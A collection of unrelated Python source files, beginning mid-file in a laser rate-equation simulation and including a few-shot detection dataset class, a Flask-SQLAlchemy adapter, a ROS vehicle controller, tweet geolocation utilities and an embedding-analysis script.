EP = P * self.TR return(np.where(P != 0, (g - self.loss - self.qP(EP)) / self.TR * P, np.zeros(P.shape))) def gdot(self, P, g, PP): spontaneous = (self.g0 - g) / self.tauL stimulated = -P * g / self.EsatL pump = self.etaP * PP / self.EsatL return(spontaneous + stimulated + pump) def f(self, t, s, u): P, g = s PP = u sdot = np.matrix([self.Pdot(P, g), self.gdot(P, g, PP)]) return sdot def grad_f(self, t, s): P, g = s loss = self.loss TR = self.TR EP = P * TR qP = self.qP(EP) EsatL = self.EsatL tauL = self.tauL dfP_dP = (g - loss - qP) / TR - EP * self.dqP_dEP(EP) dfP_dg = P / TR dfg_dP = g / EsatL dfg_dg = -1 / tauL - P / EsatL return([[dfP_dP, dfP_dg], [dfg_dP, dfg_dg]]) def g(self, t, s, u): """ This is the output function of the CT_System and returns the output power of the laser. Despite its name, is *not* related to the laser's gain! """ P, g = s return np.matrix([self.Toc * P]) @property def pumpThreshold(self): """Pump power threshold, i.e., pump power needed to start lasing""" EsatL, tauL, etaP = self.EsatL, self.tauL, self.etaP loss, DR = self.loss, self.DR return(EsatL / tauL * (loss + DR) / etaP) def steadystate(self, Ppump): """Steady state (Psteady, gsteady) given pump power Ppump""" # if Ppump is None: # Ppump = self.PP EsatL, TR, tauL = self.EsatL, self.TR, self.tauL loss, DR, etaP = self.loss, self.DR, self.etaP PPthreshold = self.pumpThreshold if Ppump <= PPthreshold: Psteady = 0. gsteady = etaP * Ppump * tauL / EsatL else: # 1. determine boundaries for Psteady: # 2. Apply root-finder (brentq) given boundaries offs = EsatL / tauL # assume non-linear losses (qP(EP)) = 0: upperBound = -offs + Ppump * etaP / loss # assume max. non-linear losses (qP(EP) = DR): lowerBound = -offs + Ppump * etaP / (loss + DR) Psteady = brentq(lambda P: -P - EsatL / tauL + etaP * Ppump / (loss + self.qP(P * TR)), lowerBound, upperBound) gsteady = loss + self.qP(Psteady * TR) return(Psteady, gsteady) def Psteady(self, Ppump): """Steady-state intracavity power given pump power Ppump""" return(self.steadystate(Ppump)[0]) def gsteady(self, Ppump): """Steady-state gain given pump power Ppump""" return(self.steadystate(Ppump)[1]) def w0(self, Ppump): """Returns natural angular frequency of disturbances around steady state. Steady state is determined from pump power Ppump.""" EsatL, TR, tauL = self.EsatL, self.TR, self.tauL Pst, gst = self.steadystate(Ppump) r = Pst / EsatL w0 = np.sqrt(r * gst / TR + Pst * self.dqP_dEP(Pst * TR) * (1. / tauL + r)) return(w0) def alpha(self, Ppump): """Damping rate of relaxation oscillations (negative real part of poles). The nice thing about alpha is that it is also correct below the lasing threshold (where it is equal to 1 / tauL).""" EsatL, TR, tauL = self.EsatL, self.TR, self.tauL Pst, gst = self.steadystate(Ppump) a = (1. / tauL + Pst * (self.dqP_dEP(Pst * TR) + 1. / EsatL)) return(a) def zeta(self, Ppump): """Damping ratio of relaxation oscillations.""" return(self.alpha(Ppump) / 2. / self.w0(Ppump)) def rho(self, Ppump): """Internal slope efficiency at pump power Ppump""" etaP, EsatL, TR = self.etaP, self.EsatL, self.TR return(self.Psteady(Ppump) * etaP / (EsatL * TR * self.w0(Ppump)**2)) @property def stable(self): """Return true if laser is stable (i.e. no Q-switching)""" return(self.zeta > 0) def approximateLTI(self, Ppump): """Linearizes the state-equations around the steady state corresponding to a pump power Ppump and returns a CT_LTI_System.""" w0 = self.w0(Ppump) zeta = self.zeta(Ppump) rho = self.rho(Ppump) Toc = self.Toc Pst = self.Psteady(Ppump) TR = self.TR dqPdEP = self.dqP_dEP(self.TR * Pst) M = np.matrix([[-Pst * dqPdEP / w0, Pst / TR / w0], [1, 0]]) A = np.matrix([[-2. * w0 * zeta, -w0], [w0, 0.]]) B = np.matrix([[w0 * rho], [0.]]) C = np.matrix([[0., Toc]]) D = np.matrix([[0.]]) return(M, CT_LTI_System(A, B, C, D)) class NdYVO4Laser(Laser): """An pre-configured example of a passively mode-locked 100 MHz Nd:YVO4 Laser""" def __init__(self, Ppump=0.): tauL = 90e-6 TR = 10e-9 FsatA = 60e-6 / 1e-4 wA = 140e-6 DR = 1.7e-2 loss = 9e-2 + 1.3e-2 wavelength = 1064e-9 sigmaEm = 114e-20 * 1e-4 wL = 62e-6 etaP = 808. / 1064. Toc = 8.7e-2 c = 3e8 h = 6.626e-34 nuL = c / wavelength EsatL = np.pi * wL**2 * h * nuL / (2 * sigmaEm) EsatA = FsatA * np.pi * wA**2 Laser.__init__(self, loss, TR, tauL, etaP, EsatL, DR, EsatA, Toc, Ppump, P0=None, g0=None) mmfewshot/detection/datasets/base.py # Copyright (c) OpenMMLab. All rights reserved. import copy import json import os.path as osp import warnings from typing import Dict, List, Optional, Sequence, Union import numpy as np from mmdet.datasets.builder import DATASETS from mmdet.datasets.custom import CustomDataset from mmdet.datasets.pipelines import Compose from terminaltables import AsciiTable from mmfewshot.utils import get_root_logger from .utils import NumpyEncoder @DATASETS.register_module() class BaseFewShotDataset(CustomDataset): """Base dataset for few shot detection. The main differences with normal detection dataset fall in two aspects. - It allows to specify single (used in normal dataset) or multiple (used in query-support dataset) pipelines for data processing. - It supports to control the maximum number of instances of each class when loading the annotation file. The annotation format is shown as follows. The `ann` field is optional for testing. .. code-block:: none [ { 'id': '0000001' 'filename': 'a.jpg', 'width': 1280, 'height': 720, 'ann': { 'bboxes': (n, 4) in (x1, y1, x2, y2) order. 'labels': (n, ), 'bboxes_ignore': (k, 4), (optional field) 'labels_ignore': (k, 4) (optional field) } }, ... ] Args: ann_cfg (list[dict]): Annotation config support two type of config. - loading annotation from common ann_file of dataset with or without specific classes. example:dict(type='ann_file', ann_file='path/to/ann_file', ann_classes=['dog', 'cat']) - loading annotation from a json file saved by dataset. example:dict(type='saved_dataset', ann_file='path/to/ann_file') classes (str | Sequence[str] | None): Classes for model training and provide fixed label for each class. pipeline (list[dict] | None): Config to specify processing pipeline. Used in normal dataset. Default: None. multi_pipelines (dict[list[dict]]): Config to specify data pipelines for corresponding data flow. For example, query and support data can be processed with two different pipelines, the dict should contain two keys like: - query (list[dict]): Config for query-data process pipeline. - support (list[dict]): Config for support-data process pipeline. data_root (str | None): Data root for ``ann_cfg``, `img_prefix``, ``seg_prefix``, ``proposal_file`` if specified. Default: None. test_mode (bool): If set True, annotation will not be loaded. Default: False. filter_empty_gt (bool): If set true, images without bounding boxes of the dataset's classes will be filtered out. This option only works when `test_mode=False`, i.e., we never filter images during tests. Default: True. min_bbox_size (int | float | None): The minimum size of bounding boxes in the images. If the size of a bounding box is less than ``min_bbox_size``, it would be added to ignored field. Default: None. ann_shot_filter (dict | None): Used to specify the class and the corresponding maximum number of instances when loading the annotation file. For example: {'dog': 10, 'person': 5}. If set it as None, all annotation from ann file would be loaded. Default: None. instance_wise (bool): If set true, `self.data_infos` would change to instance-wise, which means if the annotation of single image has more than one instance, the annotation would be split to num_instances items. Often used in support datasets, Default: False. dataset_name (str | None): Name of dataset to display. For example: 'train_dataset' or 'query_dataset'. Default: None. """ CLASSES = None def __init__(self, ann_cfg: List[Dict], classes: Union[str, Sequence[str], None], pipeline: Optional[List[Dict]] = None, multi_pipelines: Optional[Dict[str, List[Dict]]] = None, data_root: Optional[str] = None, img_prefix: str = '', seg_prefix: Optional[str] = None, proposal_file: Optional[str] = None, test_mode: bool = False, filter_empty_gt: bool = True, min_bbox_size: Optional[Union[int, float]] = None, ann_shot_filter: Optional[Dict] = None, instance_wise: bool = False, dataset_name: Optional[str] = None) -> None: self.data_root = data_root self.img_prefix = img_prefix self.seg_prefix = seg_prefix self.proposal_file = proposal_file self.test_mode = test_mode self.filter_empty_gt = filter_empty_gt if classes is not None: self.CLASSES = self.get_classes(classes) self.instance_wise = instance_wise # set dataset name if dataset_name is None: self.dataset_name = 'Test dataset' \ if test_mode else 'Train dataset' else: self.dataset_name = dataset_name # join paths if data_root is specified if self.data_root is not None: if not (self.img_prefix is None or osp.isabs(self.img_prefix)): self.img_prefix = osp.join(self.data_root, self.img_prefix) if not (self.proposal_file is None or osp.isabs(self.proposal_file)): self.proposal_file = osp.join(self.data_root, self.proposal_file) self.ann_cfg = copy.deepcopy(ann_cfg) self.data_infos = self.ann_cfg_parser(ann_cfg) assert self.data_infos is not None, \ f'{self.dataset_name} : none annotation loaded.' # load proposal file if self.proposal_file is not None: self.proposals = self.load_proposals(self.proposal_file) else: self.proposals = None # filter images too small and containing no annotations if not test_mode: # filter bbox smaller than the min_bbox_size if min_bbox_size: self.data_infos = self._filter_bboxs(min_bbox_size) # filter images valid_inds = self._filter_imgs() self.data_infos = [self.data_infos[i] for i in valid_inds] if self.proposals is not None: self.proposals = [self.proposals[i] for i in valid_inds] # filter annotations by ann_shot_filter if ann_shot_filter is not None: if isinstance(ann_shot_filter, dict): for class_name in list(ann_shot_filter.keys()): assert class_name in self.CLASSES, \ f'{self.dataset_name} : class ' \ f'{class_name} in ann_shot_filter not in CLASSES.' else: raise TypeError('ann_shot_filter only support dict') self.ann_shot_filter = ann_shot_filter self.data_infos = self._filter_annotations( self.data_infos, self.ann_shot_filter) # instance_wise will make each data info only contain one # annotation otherwise all annotation from same image will # be checked and merged. if self.instance_wise: instance_wise_data_infos = [] for data_info in self.data_infos: num_instance = data_info['ann']['labels'].size # split annotations if num_instance > 1: for i in range(data_info['ann']['labels'].size): tmp_data_info = copy.deepcopy(data_info) tmp_data_info['ann']['labels'] = np.expand_dims( data_info['ann']['labels'][i], axis=0) tmp_data_info['ann']['bboxes'] = np.expand_dims( data_info['ann']['bboxes'][i, :], axis=0) instance_wise_data_infos.append(tmp_data_info) else: instance_wise_data_infos.append(data_info) self.data_infos = instance_wise_data_infos # merge different annotations with the same image else: merge_data_dict = {} for i, data_info in enumerate(self.data_infos): # merge data_info with the same image id if merge_data_dict.get(data_info['id'], None) is None: merge_data_dict[data_info['id']] = data_info else: ann_a = merge_data_dict[data_info['id']]['ann'] ann_b = data_info['ann'] merge_dat_info = { 'bboxes': np.concatenate((ann_a['bboxes'], ann_b['bboxes'])), 'labels': np.concatenate((ann_a['labels'], ann_b['labels'])), } # merge `bboxes_ignore` if ann_a.get('bboxes_ignore', None) is not None: if not (ann_a['bboxes_ignore'] == ann_b['bboxes_ignore']).all(): merge_dat_info['bboxes_ignore'] = \ np.concatenate((ann_a['bboxes_ignore'], ann_b['bboxes_ignore'])) merge_dat_info['labels_ignore'] = \ np.concatenate((ann_a['labels_ignore'], ann_b['labels_ignore'])) merge_data_dict[ data_info['id']]['ann'] = merge_dat_info self.data_infos = [ merge_data_dict[key] for key in merge_data_dict.keys() ] # set group flag for the sampler self._set_group_flag() assert pipeline is None or multi_pipelines is None, \ f'{self.dataset_name} : can not assign pipeline ' \ f'or multi_pipelines simultaneously' # processing pipeline if there are two pipeline the # pipeline will be determined by key name of query or support if multi_pipelines is not None: assert isinstance(multi_pipelines, dict), \ f'{self.dataset_name} : multi_pipelines is type of dict' self.multi_pipelines = {} for key in multi_pipelines.keys(): self.multi_pipelines[key] = Compose(multi_pipelines[key]) elif pipeline is not None: assert isinstance(pipeline, list), \ f'{self.dataset_name} : pipeline is type of list' self.pipeline = Compose(pipeline) else: raise ValueError('missing pipeline or multi_pipelines') # show dataset annotation usage logger = get_root_logger() logger.info(self.__repr__()) def ann_cfg_parser(self, ann_cfg: List[Dict]) -> List[Dict]: """Parse annotation config to annotation information. Args: ann_cfg (list[dict]): Annotation config support two type of config. - 'ann_file': loading annotation from common ann_file of dataset. example: dict(type='ann_file', ann_file='path/to/ann_file', ann_classes=['dog', 'cat']) - 'saved_dataset': loading annotation from saved dataset. example:dict(type='saved_dataset', ann_file='path/to/ann_file') Returns: list[dict]: Annotation information. """ # join paths if data_root is specified if self.data_root is not None: for i in range(len(ann_cfg)): if not osp.isabs(ann_cfg[i]['ann_file']): ann_cfg[i]['ann_file'] = \ osp.join(self.data_root, ann_cfg[i]['ann_file']) # ann_cfg must be list assert isinstance(ann_cfg, list), \ f'{self.dataset_name} : ann_cfg should be type of list.' # check type of ann_cfg for ann_cfg_ in ann_cfg: assert isinstance(ann_cfg_, dict), \ f'{self.dataset_name} : ann_cfg should be list of dict.' assert ann_cfg_['type'] in ['ann_file', 'saved_dataset'], \ f'{self.dataset_name} : ann_cfg only support type of ' \ f'ann_file and saved_dataset' return self.load_annotations(ann_cfg) def get_ann_info(self, idx: int) -> Dict: """Get annotation by index. When override this function please make sure same annotations are used during the whole training. Args: idx (int): Index of data. Returns: dict: Annotation info of specified index. """ return copy.deepcopy(self.data_infos[idx]['ann']) def prepare_train_img(self, idx: int, pipeline_key: Optional[str] = None, gt_idx: Optional[List[int]] = None) -> Dict: """Get training data and annotations after pipeline. Args: idx (int): Index of data. pipeline_key (str): Name of pipeline gt_idx (list[int]): Index of used annotation. Returns: dict: Training data and annotation after pipeline with new keys \ introduced by pipeline. """ img_info = self.data_infos[idx] ann_info = self.get_ann_info(idx) # select annotation in `gt_idx` if gt_idx is not None: selected_ann_info = { 'bboxes': ann_info['bboxes'][gt_idx], 'labels': ann_info['labels'][gt_idx] } # keep pace with new annotations new_img_info = copy.deepcopy(img_info) new_img_info['ann'] = selected_ann_info results = dict(img_info=new_img_info, ann_info=selected_ann_info) # use all annotations else: results = dict(img_info=copy.deepcopy(img_info), ann_info=ann_info) if self.proposals is not None: results['proposals'] = self.proposals[idx] self.pre_pipeline(results) if pipeline_key is None: return self.pipeline(results) else: return self.multi_pipelines[pipeline_key](results) def _filter_annotations(self, data_infos: List[Dict], ann_shot_filter: Dict) -> List[Dict]: """Filter out extra annotations of specific class, while annotations of classes not in filter remain unchanged and the ignored annotations will be removed. Args: data_infos (list[dict]): Annotation infos. ann_shot_filter (dict): Specific which class and how many instances of each class to load from annotation file. For example: {'dog': 10, 'cat': 10, 'person': 5} Returns: list[dict]: Annotation infos where number of specified class shots less than or equal to predefined number. """ if ann_shot_filter is None: return data_infos # build instance indices of (img_id, gt_idx) filter_instances = {key: [] for key in ann_shot_filter.keys()} keep_instances_indices = [] for idx, data_info in enumerate(data_infos): ann = data_info['ann'] for i in range(ann['labels'].shape[0]): instance_class_name = self.CLASSES[ann['labels'][i]] # only filter instance from the filter class if instance_class_name in ann_shot_filter.keys(): filter_instances[instance_class_name].append((idx, i)) # skip the class not in the filter else: keep_instances_indices.append((idx, i)) # filter extra shots for class_name in ann_shot_filter.keys(): num_shots = ann_shot_filter[class_name] instance_indices = filter_instances[class_name] if num_shots == 0: continue # random sample from all instances if len(instance_indices) > num_shots: random_select = np.random.choice( len(instance_indices), num_shots, replace=False) keep_instances_indices += \ [instance_indices[i] for i in random_select] # number of available shots less than the predefined number, # which may cause the performance degradation else: # check the number of instance if len(instance_indices) < num_shots: warnings.warn(f'number of {class_name} instance is ' f'{len(instance_indices)} which is ' f'less than predefined shots {num_shots}.') keep_instances_indices += instance_indices # keep the selected annotations and remove the undesired annotations new_data_infos = [] for idx, data_info in enumerate(data_infos): selected_instance_indices = \ sorted(instance[1] for instance in keep_instances_indices if instance[0] == idx) if len(selected_instance_indices) == 0: continue ann = data_info['ann'] selected_ann = dict( bboxes=ann['bboxes'][selected_instance_indices], labels=ann['labels'][selected_instance_indices], ) new_data_infos.append( dict( id=data_info['id'], filename=data_info['filename'], width=data_info['width'], height=data_info['height'], ann=selected_ann)) return new_data_infos def _filter_bboxs(self, min_bbox_size: int) -> List[Dict]: new_data_infos = [] for data_info in self.data_infos: ann = data_info['ann'] keep_idx, ignore_idx = [], [] for i in range(ann['bboxes'].shape[0]): bbox = ann['bboxes'][i] w = bbox[2] - bbox[0] h = bbox[3] - bbox[1] # check bbox size if w < min_bbox_size or h < min_bbox_size: ignore_idx.append(i) else: keep_idx.append(i) # remove undesired bbox if len(ignore_idx) > 0: bboxes_ignore = ann.get('bboxes_ignore', np.zeros((0, 4))) labels_ignore = ann.get('labels_ignore', np.zeros((0, ))) new_bboxes_ignore = ann['bboxes'][ignore_idx] new_labels_ignore = ann['labels'][ignore_idx] bboxes_ignore = np.concatenate( (bboxes_ignore, new_bboxes_ignore)) labels_ignore = np.concatenate( (labels_ignore, new_labels_ignore)) data_info.update( ann=dict( bboxes=ann['bboxes'][keep_idx], labels=ann['labels'][keep_idx], bboxes_ignore=bboxes_ignore, labels_ignore=labels_ignore)) new_data_infos.append(data_info) return new_data_infos def _set_group_flag(self) -> None: """Set flag according to image aspect ratio. Images with aspect ratio greater than 1 will be set as group 1, otherwise group 0. In few shot setting, the limited number of images might cause some mini-batch always sample a certain number of images and thus not fully shuffle the data, which may degrade the performance. Therefore, all flags are simply set to 0. """ self.flag = np.zeros(len(self), dtype=np.uint8) def load_annotations_saved(self, ann_file: str) -> List[Dict]: """Load data_infos from saved json.""" with open(ann_file) as f: data_infos = json.load(f) # record the index of meta info meta_idx = None for i, data_info in enumerate(data_infos): # check the meta info CLASSES and img_prefix saved in json if 'CLASSES' in data_info.keys(): assert self.CLASSES == tuple(data_info['CLASSES']), \ f'{self.dataset_name} : class labels mismatch.' assert self.img_prefix == data_info['img_prefix'], \ f'{self.dataset_name} : image prefix mismatch.' meta_idx = i # skip the meta info continue # convert annotations from list into numpy array for k in data_info['ann']: assert isinstance(data_info['ann'][k], list) # load bboxes and bboxes_ignore if 'bboxes' in k: # bboxes_ignore can be empty if len(data_info['ann'][k]) == 0: data_info['ann'][k] = np.zeros((0, 4)) else: data_info['ann'][k] = \ np.array(data_info['ann'][k], dtype=np.float32) # load labels and labels_ignore elif 'labels' in k: # labels_ignore can be empty if len(data_info['ann'][k]) == 0: data_info['ann'][k] = np.zeros((0, )) else: data_info['ann'][k] = \ np.array(data_info['ann'][k], dtype=np.int64) else: raise KeyError(f'unsupported key {k} in ann field') # remove meta info if meta_idx is not None: data_infos.pop(meta_idx) return data_infos def save_data_infos(self, output_path: str) -> None: """Save data_infos into json.""" # numpy array will be saved as list in the json meta_info = [{'CLASSES': self.CLASSES, 'img_prefix': self.img_prefix}] with open(output_path, 'w', encoding='utf-8') as f: json.dump( meta_info + self.data_infos, f, ensure_ascii=False, indent=4, cls=NumpyEncoder) def __repr__(self) -> str: """Print the number of instances of each class.""" result = (f'\n{self.__class__.__name__} {self.dataset_name} ' f'with number of images {len(self)}, ' f'and instance counts: \n') if self.CLASSES is None: result += 'Category names are not provided. \n' return result instance_count = np.zeros(len(self.CLASSES) + 1).astype(int) # count the instance number in each image for idx in range(len(self)): label = self.get_ann_info(idx)['labels'] unique, counts = np.unique(label, return_counts=True) if len(unique) > 0: # add the occurrence number to each class instance_count[unique] += counts else: # background is the last index instance_count[-1] += 1 # create a table with category count table_data = [['category', 'count'] * 5] row_data = [] for cls, count in enumerate(instance_count): if cls < len(self.CLASSES): row_data += [f'{cls} [{self.CLASSES[cls]}]', f'{count}'] else: # add the background number row_data += ['-1 background', f'{count}'] if len(row_data) == 10: table_data.append(row_data) row_data = [] if len(row_data) != 0: table_data.append(row_data) table = AsciiTable(table_data) result += table.table return result 1-10 # encoding: utf-8 """ Flask-SQLAlchemy adapter ------------------------ """ import sqlite3 from flask_sqlalchemy import SQLAlchemy as BaseSQLAlchemy from sqlalchemy import engine def set_sqlite_pragma(dbapi_connection, connection_record): """ SQLite supports FOREIGN KEY syntax when emitting CREATE statements for tables, however by default these constraints have no effect on the operation of the table. http://docs.sqlalchemy.org/en/latest/dialects/sqlite.html#foreign-key-support """ if not isinstance(dbapi_connection, sqlite3.Connection): return cursor = dbapi_connection.cursor() cursor.execute("PRAGMA foreign_keys=ON") cursor.close() class AlembicDatabaseMigrationConfig(object): """ Helper config holder that provides missing functions of Flask-Alembic package since we use custom invoke tasks instead. """ def __init__(self, database, directory='migrations', **kwargs): self.db = database self.directory = directory self.configure_args = kwargs class SQLAlchemy(BaseSQLAlchemy): """ Customized Flask-SQLAlchemy adapter with enabled autocommit, constraints auto-naming conventions and ForeignKey constraints for SQLite. """ # def __init__(self, *args, **kwargs): # if 'session_options' not in kwargs: # kwargs['session_options'] = {} # kwargs['session_options']['autocommit'] = True # # Configure Constraint Naming Conventions: # # http://docs.sqlalchemy.org/en/latest/core/constraints.html#constraint-naming-conventions # kwargs['metadata'] = MetaData( # naming_convention={ # 'pk': 'pk_%(table_name)s', # 'fk': 'fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s', # 'ix': 'ix_%(table_name)s_%(column_0_name)s', # 'uq': 'uq_%(table_name)s_%(column_0_name)s', # 'ck': 'ck_%(table_name)s_%(constraint_name)s', # } # ) # super(SQLAlchemy, self).__init__(*args, **kwargs) def init_app(self, app): super(SQLAlchemy, self).init_app(app) database_uri = app.config['SQLALCHEMY_DATABASE_URI'] assert database_uri, "SQLALCHEMY_DATABASE_URI must be configured!" if database_uri.startswith('sqlite:'): self.event.listens_for(engine.Engine, "connect")(set_sqlite_pragma) app.extensions['migrate'] = AlembicDatabaseMigrationConfig(self, compare_type=True) sdk/textanalytics/azure-ai-textanalytics/azure/ai/textanalytics/_check.py # pylint: disable=too-many-lines # ------------------------------------ # Copyright (c) Microsoft Corporation. # Licensed under the MIT License. # ------------------------------------ import re def is_language_api(api_version): """Language API is date-based """ return re.search(r'\d{4}-\d{2}-\d{2}', api_version) def string_index_type_compatibility(string_index_type): """Language API changed this string_index_type option to plural. Convert singular to plural for language API """ if string_index_type == "TextElement_v8": return "TextElements_v8" return string_index_type import rospy from pid import PID from yaw_controller import YawController from lowpass import LowPassFilter GAS_DENSITY = 2.858 ONE_MPH = 0.44704 # Nalini - added 9/1/2018 class Controller(object): def __init__(self, *args, **kwargs): # TODO: Implement self.wheel_base = kwargs['wheel_base'] self.steer_ratio = kwargs['steer_ratio'] self.fuel_capacity = kwargs['fuel_capacity'] self.min_speed = 0 self.max_lat_accel = kwargs['max_lat_accel'] self.max_steer_angle = kwargs['max_steer_angle'] self.decel_limit = kwargs['decel_limit'] self.accel_limit = kwargs['accel_limit'] self.wheel_radius = kwargs['wheel_radius'] Kp = 1 Ki = 0 Kd = 0.05 self.pid_controller = PID(Kp, Ki, Kd, mn = self.decel_limit, mx = self.accel_limit) self.yaw_controller = YawController(self.wheel_base, self.steer_ratio, self.min_speed, self.max_lat_accel, self.max_steer_angle) tau = 0.5 ts = .02 self.vel_lpf = LowPassFilter(tau, ts) self.vehicle_mass = kwargs['vehicle_mass'] + kwargs['fuel_capacity'] * GAS_DENSITY self.brake_deadband = kwargs['brake_deadband'] self.last_time = rospy.get_time() def control(self, current_vel, dbw_enabled, linear_vel, angular_vel): # TODO: Change the arg, kwarg list to suit your needs # Return throttle, brake, steer if not dbw_enabled: self.pid_controller.reset() return 0., 0., 0. current_vel = self.vel_lpf.filt(current_vel) steering = self.yaw_controller.get_steering(linear_vel, angular_vel, current_vel) vel_error = linear_vel - current_vel self.last_vel = current_vel current_time = rospy.get_time() sample_time = current_time - self.last_time self.last_time = current_time throttle = self.pid_controller.step(vel_error, sample_time) brake = 0 if linear_vel == 0 and current_vel < 0.1: throttle = 0 brake = 400 # car stops at light elif throttle < .1 and vel_error < 0: throttle = 0 decel = max(vel_error, self.decel_limit) brake = abs(decel)*self.vehicle_mass*self.wheel_radius return throttle, brake, steering src/func/geo_utils.py import fiona from shapely.geometry import Point, Polygon, MultiPolygon import geopandas as geopd import json from pyproj import Proj, transform def get_shape(geoJsonFileName): print(geoJsonFileName) # geopandas struggels with PosixPaths return geopd.read_file(str(geoJsonFileName)) def loadGeneric(shapefile, key="PUBLIC_NAM", city_key="", city_id=""): """Load any shapefile. Ex usage: park_polygon_list,park_name_list = loadGeneric("shapefiles/nps_boundary.shp",key="UNIT_NAME"):""" c = fiona.open(shapefile, 'r') polygonList = [] nameList = [] polygonCount = 0 multiPolygonCount = 0 print(city_key, city_id) for city in list(c): if city['properties'][city_key] == city_id: nameList.append(city['properties'][key]) try: if city['geometry']['type'] == 'Polygon': polygonCount += 1 coordinates = city['geometry']['coordinates'] polygonList.append(Polygon(coordinates[0])) elif city['geometry']['type'] == 'MultiPolygon': multiPolygonCount += 1 coordinates = city['geometry']['coordinates'] coordinates_w_holes = [(tuple(c[0]), ()) if len( c) == 1 else (tuple(c[0]), (c[1:])) for c in coordinates] polygonList.append(MultiPolygon(coordinates_w_holes)) else: raise('unknown geometry ' % city['geometry']['type']) except TypeError: pass print('done loading') return polygonList, nameList def cityID(polygonList, pt): for i, city in enumerate(polygonList): if city.contains(pt): return i return -1 def merge_tweets(path): """ Takes a directory (path object) and joins the files into single json """ tweet_files = [e for e in path.iterdir() if e.is_file()] all_tweets = [] for file_path in tweet_files: with open(str(file_path)) as f: day_of_tweets = json.load(f) all_tweets.extend(day_of_tweets) return(all_tweets) def reproj_tweet(tweet): tweet_crs = Proj({'proj': 'longlat', 'ellps': 'WGS84', 'datum': 'WGS84'}) tpl_crs = Proj({'proj': 'aea', 'lat_1': 20, 'lat_2': 60, 'lat_0': 40, 'lon_0': -96, 'x_0': 0, 'y_0': 0, 'datum': 'NAD83', 'units': 'm', 'no_defs': True, 'wktext': True}) lon = tweet['geo']['coordinates'][0] lat = tweet['geo']['coordinates'][1] lon, lat = transform(tweet_crs, tpl_crs, lon, lat) return [lon, lat] def get_park_tweets(tweets, pList, nList): """Takes a list of tweets as processed from the mongodb. Returns tweets with coordinates originating in the pList (e.g., park polygons loaded from a shapefile """ park_tweets = [] control_tweets = [] current_tweet = {} for tweet in tweets: coords = reproj_tweet(tweet) # tweet['geo']['coordinates'] # coords = [coords[1], coords[0]] park_id = cityID(pList, Point(Point(coords))) tweet['park_id'] = park_id if park_id >= 0: tweet['park_name'] = nList[park_id] print("found park tweet") park_tweets.append(tweet) control_tweets.append(current_tweet) else: current_tweet = tweet return park_tweets, control_tweets src/refinement/__init__.py from .config import RefinementConfig from .knowledge import KnowledgeProcessor''' BINARY TREE LEVEL ORDER TRAVERSAL Given a binary tree, return the level order traversal of its nodes' values. (ie, from left to right, level by level). 3 / \ 9 20 ----> [[3], [9, 20], [15, 7]] / \ 15 7 ''' def levelOrder(root: TreeNode) -> List[List[int]]: if not root: return [] ans, level = [], [root] while level: ans.append([l.val for l in level]) # ---- Add ListNode vals from previous levels new = [] for n in level: # ---- Add children of current level ListNodes to next level if n.left: new.append(n.left) if n.right: new.append(n.right) if level is not new: # ---- Exit if we reach leaf nodes level = new else: level = [] return ans class LivecliError(Exception): """Any error caused by Livecli will be caught with this exception.""" class PluginError(LivecliError): """Plugin related error.""" class NoStreamsError(LivecliError): def __init__(self, url): self.url = url err = "No streams found on this URL: {0}".format(url) Exception.__init__(self, err) class NoPluginError(PluginError): """No relevant plugin has been loaded.""" class StreamError(LivecliError): """Stream related error.""" __all__ = ["LivecliError", "PluginError", "NoPluginError", "NoStreamsError", "StreamError"] import sys sys.path.append('/gpfs/projects/bsc28/tiramisu_semantic_transfer/') import numpy as np from tiramisu.tensorflow.core.backend import read_embeddings embeddings = ['1284246'] labels = ['dog'] for emb,lab in zip(embeddings,labels): (results, img_paths, labels, layers_dict) = read_embeddings(path_prefix="/gpfs/projects/bsc28/tiramisu_semantic_transfer/embeddings/1284246/train/embeddings_0") print '-----------------' print 'Going in with',emb,' ',lab dmp = np.copy(results == 1) #Currently exploring only the positives #dmn = np.copy(results == -1) #dm = np.concatenate((dmp , dmn), axis=1) #Get subset by synset pos_emb = dmp[[x==lab for x in labels]] neg_emb = dmp[[x!=lab for x in labels]] print 'Size of '+lab+' embedding',pos_emb.shape print 'Size of complementary embedding',neg_emb.shape #Compute distribution per feature. pos_feature_counts = [] neg_feature_counts = [] pos_full_hits = 0 pos_full_misses = 0 neg_full_hits = 0 neg_full_misses = 0 pos_features_maj_ones = [] neg_features_maj_ones = [] counter = 0 for p,n in zip(pos_emb.T,neg_emb.T): p_unique, p_counts = np.unique(p, return_counts=True) n_unique, n_counts = np.unique(n, return_counts=True) #If there is ony one value if len(p_counts)==1: #its a full hit! if p_unique[0] == True: pos_full_hits+=1 pos_feature_counts.append(p_counts) #Full miss else: pos_full_misses+=1 pos_feature_counts.append(0) #if there are two values, get the second which corresponds to True else: if p_counts[1]>p_counts[0]: pos_features_maj_ones.append(counter) try: pos_feature_counts.append(p_counts[1]) except IndexError: print 'An error occurred when processing counts',p_counts #If there is ony one value if len(n_counts)==1: #its a full hit! if n_unique[0] == True: neg_full_hits+=1 neg_feature_counts.append(n_counts) #Full miss else: neg_full_misses+=1 neg_feature_counts.append(0) #if there are two values, get the second which corresponds to True else: if n_counts[1]>n_counts[0]: neg_features_maj_ones.append(counter) try: neg_feature_counts.append(n_counts[1]) except IndexError: print 'An error occurred when processing counts',n_counts counter+=1 print lab+' Positive full hits:',pos_full_hits, ' full misses:',pos_full_misses print lab+' Negative full hits:',neg_full_hits, ' and full misses:',neg_full_misses #print 'Features with majority of ones:',features_maj_ones #Store #np.save(open('liv_embedding_feature_counts.npy','w'),feature_counts) #Plot import matplotlib matplotlib.use('pdf') import matplotlib.mlab as mlab import matplotlib.pyplot as plt #Get only the positive cases. its simetrical to 50K n, bins, patches = plt.hist(pos_feature_counts, 500, facecolor='green', alpha=0.75) plt.axvline(pos_emb.shape[0]/2, color='k', linestyle='solid') plt.savefig('positive_features_distributions_'+lab+'.pdf') plt.clf() n, bins, patches = plt.hist(neg_feature_counts, 500, facecolor='green', alpha=0.75) plt.axvline(neg_emb.shape[0]/2, color='k', linestyle='solid') plt.savefig('negative_features_distributions_'+lab+'.pdf') plt.clf() pos_f = open(lab+'_pos_features_maj_ones.txt','w') for item in pos_features_maj_ones: pos_f.write("%s\n" % item) pos_f.close() neg_f = open(lab+'_neg_features_maj_ones.txt','w') for item in neg_features_maj_ones: neg_f.write("%s\n" % item) neg_f.close() ###Load most frequent feature values separately #most_freq_vals_dead = [] #most_freq_vals_live = [] #for d,a in zip(dead_emb.T,live_emb.T): # most_freq_vals_dead.append(np.argmax(np.bincount(d))) # most_freq_vals_live.append(np.argmax(np.bincount(a))) 